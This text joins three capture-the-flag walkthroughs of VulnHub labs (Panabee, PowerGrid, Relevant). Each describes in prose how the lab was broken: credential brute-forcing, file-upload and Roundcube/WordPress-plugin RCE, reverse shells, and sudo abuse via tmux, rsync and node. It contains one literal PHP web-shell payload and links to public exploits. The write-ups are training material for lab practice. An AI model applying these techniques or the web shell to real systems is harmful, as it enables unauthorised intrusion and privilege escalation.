Panabee: 1: Vulnhub Walkthrough

Introduction

Today we are going to crack this vulnerable machine called Panabee: 1. It is created by ch4rm. He is available on Twitter by handle aniqfakhrul. This is a Boot to root kind of challenge. We need to get root privileges on the machine and read the root flag to complete the challenge. Overall it was an intermediate machine to crack.

Download Lab from here.

Penetration Testing Methodology

  • Network Scanning
    • Nmap Port Scan
  • Enumeration
    • Browsing HTTP Service
    • Enumerating SMB Service
    • Bruteforcing FTP Credentials
    • Enumerating FTP Service
  • Exploitation
    • Exploiting File Upload Vulnerability
  • Post Exploitation
    • Enumerating Sudo Permissions
    • Uploading Malicious Script
    • Getting Jenny User Session
    • Downloading pspy64 script
    • Running pspy64 script
  • Privilege Escalation
    • Exploiting tmux for Root
  • Reading Root Flag

Walkthrough

Network Scanning

The IP Address of the machine is found to be 192.168.0.165. To move forward we need to find the services that are running on the machine. We can achieve this using a nmap Aggressive scan.  Nmap reveals a lot of services. We have the FTP (21), SSH (22), SMTP (25), HTTP (80), NetBIOS (139, 445).

Enumeration

We start with the Enumeration stage. The first Service we decided to take a look was HTTP. Upon looking at the IP Address in Web Browser we see an Apache2 Default Page. Nothing special to look here.

After this, Next service we decided to enumerate was SMB. We connected to the service using the smbclient tool. Here we see the bunch of shares that are hosted on the machine. The share “note” seemed to be worth looking into. We reconnect to that share. Here we find a text file by the same name. We download the text file onto our local system using the get command. We read the text file it was addressed to goper. Cool a username. The note apologises for late response and mentions the server will backup whatever the files that are into the home directory of the user goper.

Since there is a user on the machine by the name of goper. It is possible that goper has the access to the FTP service. The issue with this theory that we are still unaware for a password for the user goper. This is where we thought that Bruteforcing is a good idea. We used the rockyou wordlist and Hydra as the tool to bruteforce. In few seconds it was in front of us that the password for the user goper is spiderman. My spider senses are tingling here. Let’s take a look inside the FTP service.

We connect to FTP service using the credentials that we just found. Here we have a python file by the name of the status. We downloaded the status.py to our local system to take a closer look at it. A simple look on the script tells us all this does is send ping packets to the server or home IP Address and writes the Status that Server is up or down in a file status.txt inside the user jenny’s home directory. Cool another user.

Exploitation

Since there is a backup functionality and FTP service that means we can upload files to the target machine as the user goper. This makes this simple. We can create a simple bash reverse shell and upload it using the FTP service and get a session on the target machine. We created a shell file as shown in the image below.

Now we connect to the FTP service again and we upload the backup.sh payload file using the put command. The upload was successful.

Post Exploitation

We started the netcat listener to capture the session generated by the payload. We get the session in a few moments. After getting the session, we use the sudo -l command to check for the binaries that can be used to escalate the privilege on the target machine. We can see that we can execute the status.py file with root permissions as jenny user. That means we need to first replace the status.py with a reverse shell and get a session as jenny user.

We created a reverse python shell targeting port 8888 of our local machine.

Now we need to send this file to the Target machine. For this, we will be using the FTP service. Now that we have uploaded a shell file but it won’t have the execution privileges. For this, we will use the chmod command from the FTP shell as shown in the image below.

Now we create the listener on the port 8888 and get back to the session we have as the goper user. Here we will execute the file we just uploaded as jenny user.

We get back to the listener we created. Here we can see that we have a session as jenny. We move to the tmp directory as it has write permissions. Then we download the pspy64 script on the target machine. We provide it with proper permissions and execute it.

We see that there are processes related to tmux server. This means that it is possible to get the root using tmux.

We also take a look at history and find that a lot of tmux was used. This command shows that a session of tmux is being shared. We can also see that tmux default is located in the opt directory.

Privilege Escalation

To get root from tmux is not that difficult of a task. If you are not familiar to tmux or getting root as tmux, check our article here. We need to Export the Term to xterm to execute it using tmux.  Now use the tmux to attach the default socket.

Now that tmux is executed with set the TERM to xterm and we have the root privilege as shown in the image below. Now, we will traverse into the root directory to read the root flag. This concludes this box.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on Twitter and LinkedIn

PowerGrid: 1.0.1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “PowerGrid: 1.0.1“.  It’s available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to Thomas Williams. Let’s start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Dirsearch

Exploiting

  • HTTP Basic Authentication Brute Force
  • Execute remote code (RCE) Roundcube exploit
  • Decrypt key PGP and abuse for SSH

Privilege Escalation

  • Abuse of sudo Rsync
  • Abuse of pivoting SSH
  • Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

So, we put the IP address in our “/etc/hosts” file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

Enumeration

The game begins and the burden since we will only have 3 hours to solve the challenge and thus save the critical infrastructure.

We access the web service, we see the time, but we also list three users: deez1, p48 and all2.

We use dirsearch and list a directory protected with HTTP Authentication Basic.

With what we found and knowing 3 users, we will make a brute force attack with the Hydra tool and the rockyou dictionary.

We managed to access with the credentials obtained and listed webmail with Roundcube.

We use the same credentials and can read a single email, in it we have an encrypted message in PGP, but to be able to read its content in plain, we need the private key and the password. It is very likely that it is the same password since this user has reused the same password for several services.

Exploiting

We listed the version of Roundcube and looked for exploits, we found that it has a version vulnerable to RCE (Remote Code Execution)

Exploit: https://www.exploit-db.com/exploits/40892

As always, we will review what the exploitation consists of and make a proof of concept, this proof will create an info.php file.

Legitimate request:

Malicious request:

We run the file and see that the site is indeed vulnerable.

Now we will create a php file that allows us to execute arbitrary commands.

Payload URL-encode: <?php passthru($_GET[‘cmd’]); ?>

We check that our file works:

Perfect! Now we’ll put a netcat on the wire and run a reverse shell. (remember to encode it in URL-encode all characters)

Great! Now we will use our two favourite commands to get an interactive shell.

We will go through files and directories recursively, we will stumble upon the first flag and the first hint.

So let’s start, we identify ourselves with the user “p48” reusing the same credentials and we find in his folder “/home/” the gpg private key (remember that it was the only one we were missing to be able to decipher the text).

For a strange reason, the native “gpg” tool didn’t work for me, so I had to use this online tool and we get a SSH private key.

The machine we have committed to had no SSH service open, we remembered the “pivot” track, checked the connections and found a service that works by “docker“.

We give 600 permissions to the private key and use it to connect via SSH to the docker and read the 2nd flag and the next hint.

The next hint leads me to run “sudo -l” and check that you can run the rsync binary as root.  We execute the following command to escalate privileges as root abusing this advantage.

And once being root, we access its folder and read the 3rd flag and the next hint.

Privilege Escalation (root)

“backwards? pivoting?” Let’s repeat the SSH move, but this time we will do it from the compromised docker-machine.

Great! We have permissions as root and we can read the last flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.

Relevant: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “Relevant: 1“.  It’s available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to @iamv1nc3nt. Let’s start and learn how to break it down successfully.

Level: Intermediate

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Dirsearch
  • Nmap with scripts WordPress

Exploiting

  • Wp-file-manager 6.7 Remote Code Execution (RCE)

Privilege Escalation

  • Abuse of credentials with weak hashes in hidden files
  • Abuse of sudo
  • Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

So, we put the IP address in our “/etc/hosts” file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

Enumeration

So far it seems all easy, a web service with some links containing credential information in leaks and a QR code to set up a double authentication factor (2FA) . Too beautiful to be true!

Listing of credentials in public leaks.

Content of the QR code:

We log in via SSH, insert the password, insert the double authentication factor and disconnect! The account has disabled the use of this service, so it is a rabbit hole.

It’s time to launch my favourite fuzzing tool, in my case I used dirsearch. We list that there are WordPress files and directories displayed on the machine.

Going back to the clue given by the creator of the machine in the description: “enumerate the box, then enumerate the box differently“.

Since our only evidence is the remains of WordPress files, we will try with the nmaps scripts for this CMS.

It will list two plugins, among them “wp-file-manager 6.7“.

Exploiting

After the above list, we look for exploits and vulnerabilities that we can exploit for this version. We found an exploit that allows remote code execution without the need for authentication.

Exploit: https://github.com/w4fz5uck5/wp-file-manager-0day

Execute the exploit and access the server.

Since visibility is a bit of a problem, we upload a “pentestmonkey” webshell, put a netcat on it and run our webshell.

We execute our two favourite commands to get an interactive shell.

We read the file “wp-config.php“, but something tells me that the password is not going to help us much either. xD

We checked the files of the user “h4x0r” and found a “hidden” folder with three dots, in it there is a file called “note.txt” with some credentials in SHA-1 that we must crack.

We access the online site “hashes.com” and insert our hash and get the password in plain text.

Privilege Escalation (root)

Now yes, we authenticate with the user “news“, we execute “sudo -l” and we see that we have permissions to execute the binary “node”.

We take advantage of this to scale privileges in the system as root, for this we will execute the following syntax.

And finally, we will read our deserved flag!

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.